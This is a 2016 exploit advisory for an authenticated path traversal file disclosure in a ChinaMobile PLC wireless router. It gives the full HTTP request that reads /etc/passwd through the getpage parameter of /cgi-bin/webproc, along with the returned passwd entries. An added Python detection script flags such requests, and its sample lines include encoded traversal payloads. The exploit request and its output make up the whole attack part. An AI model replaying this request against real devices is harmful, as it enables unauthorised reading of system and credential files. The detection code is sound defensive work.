PLC Wireless Router GPN2.4P21-C-CN File Disclosure
Posted on 30 August 2016
# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN Authorised Arbitrary File Disclosure
# Date: 28/08/2016
# Exploit Author: Rahul Raz
# Affected Model: GPN2.4P21-C-CN (Firmware - W2001EN-00)
# Vendor: ChinaMobile
# Tested on: Ubuntu Linux
_____________________________________________________

GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected
Host: 192.168.59.254
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: sessionid=64857d81
Connection: keep-alive

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: sessionid=64857d81; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/

#root:x:0:0:root:/root:/bin/bash
#root:x:0:0:root:/root:/bin/sh
#root:x:0:0:root:/root:/usr/bin/cmd
#tw:x:504:504::/home/tw:/bin/bash
#tw:x:504:504::/home/tw:/bin/msh
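
A detection check for the request shown above, added here as an example (it is not part of the original advisory or any vendor code): it flags webproc requests whose getpage value leaves the page directory, and it also covers percent-encoded and backslash forms beyond the single case in the advisory. The sample request lines, the function names and the three-round decode limit are assumptions.

```python
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample request lines (not captured traffic); the first mirrors
# the request in the advisory, the rest are made up to exercise the check.
SAMPLE_REQUESTS = [
    "GET /cgi-bin/webproc?getpage=../../../etc/passwd&var:language=en_us&var:menu=setup&var:page=connected",
    "GET /cgi-bin/webproc?getpage=html/index.html&var:language=en_us&var:menu=setup&var:page=connected",
    "GET /cgi-bin/webproc?getpage=%252e%252e%252fetc%252fpasswd&var:menu=setup",
    "GET /cgi-bin/webproc?var:menu=setup&getpage=html/..%5c..%5cetc/passwd",
    "GET /index.html?getpage=../x",
]

MAX_DECODE_ROUNDS = 3  # assumption: enough to unwrap nested percent-encoding


def fully_decode(value):
    """Percent-decode repeatedly so a nested encoding is seen in its final form."""
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def getpage_traversal(request_line):
    """Return the decoded getpage value if it escapes the page directory, else None."""
    parts = request_line.split()
    if len(parts) < 2:
        return None
    url = urlsplit(parts[1])
    if not url.path.endswith("/cgi-bin/webproc"):
        return None
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        if name != "getpage":
            continue
        # parse_qsl decodes once; decode further and normalise separators.
        value = fully_decode(raw).replace("\\", "/")
        if value.startswith("/") or ".." in value.split("/") or "\x00" in value:
            return value
    return None


def scan(lines):
    """Return (request_line, decoded_getpage) pairs for every flagged request."""
    return [(line, hit) for line in lines if (hit := getpage_traversal(line))]
```

Run over proxy or web-server access logs, scan() returns the decoded value next to each flagged line, which makes it easy to see which file a request was aimed at.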